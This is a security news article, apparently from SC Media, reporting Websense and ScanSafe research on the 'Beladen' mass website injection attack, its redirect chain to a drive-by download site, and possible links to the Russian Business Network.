Incident Response, Malware, Network Security, Patch/Configuration Management, TDR, Vulnerability Management

“Beladen” website compromises cropping up

A mass injection attack similar, but unrelated, to Gumblar has infected more than 40,000 websites, according to new research from Websense Security Labs.

Thousands of websites are now redirecting unsuspecting users to an exploit site called Beladen, which by means of drive-by download is serving up a trojan downloader to users running older browser versions, and pop-up ads promoting rogue anti-virus for those who are patched, Stephan Chenette, manager of security research at Websense told SCMagazineUS.com on Monday.

“Beladen in German means ‘loaded,' which is a suitable name because Beladen is loaded with exploits,” Chanette said.

The Beladen.net domain isn't new  – it's been around since last June, Mary Landesman, senior security researcher at ScanSafe, told SCMagazineUS.com on Monday. Chanette said that while Beladen.net has been flagged by the security community as malicious for quite some time, but its only recently that Beladen.net became involved as the final landing page in this massive injection attack. Landesman added that Beladen is an example of a larger trend: the mass-compromise of legitimate websites, which was illustrated recently with the huge uptick in Gumblar infections.

Those behind this new attack are sweeping the web looking for vulnerable websites -- and as of Monday have compromised about 40,000, Chanette said. He added that Websense is still analyzing this threat and it's still unclear what the common vulnerability is, but attackers have found a hole in these websites which has enabled them to inject malicious obfuscated, or scrambled, JavaScript code, Chanette said. The vulnerability is most likely present in some type of content management system, forum or blogging software, or some underlying web framework on which the websites are built, Chanette added.

As a result of the malicious code, when a user visits one of these compromised sites they are redirected twice -- first to a website that logs statistical information for the attacker, and then to the Beladen site where the malware is served. These redirections occur within milliseconds of each other, Chanette said.

Once at the Beladen site, if the user is not running the latest version of Firefox or Internet Explorer, their machine would be compromised by the drive-by-download, which does not require any user interaction, Chanette said. If the user is running an up-to-date browser, they will be served pop-up ads prompting them to download rogue anti-virus software.

This exploit is similar to Gumblar in that it's an example of a mass-injection attack. However, the exploits being used and domains involved are different from Gumblar, leading researchers at Websense to believe these two attacks are unrelated, Chanette said.

ScanSafe's Landesman agreed, noting that Beladen is a smaller scale attack than Gumblar. During the month of May, Gumblar accounted for 37 percent of all web malware blocks made by ScanSafe, whereas Beladen only accounted for .03 percent, Landesman said.

“Like most of these long-living attack domains they will go silent for a while, and will crop back up,” Landesman said.

But, Landesman added that the overall problem of mass injection attacks is significant, with close to 1,000 unique attacks every two weeks.

"Beladen is one of 1,000," she said.

Chanette said that the Russian Business Network (RBN) might be responsible for this attack because the first site that users are redirected to, which logs statistical information for the attacker, was formerly owned by the RBN. It's a typo squatting site which uses a name similar to the legitimate Google Analytics domain (https://www.google-analystics.com), which provides statistic services for websites.

“The Beladen mass injection attack is very indicative that the RBN might be back at work, which would be huge news for the security community since we thought at one point that they had disappeared from the malicious scene,” Chanette said.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.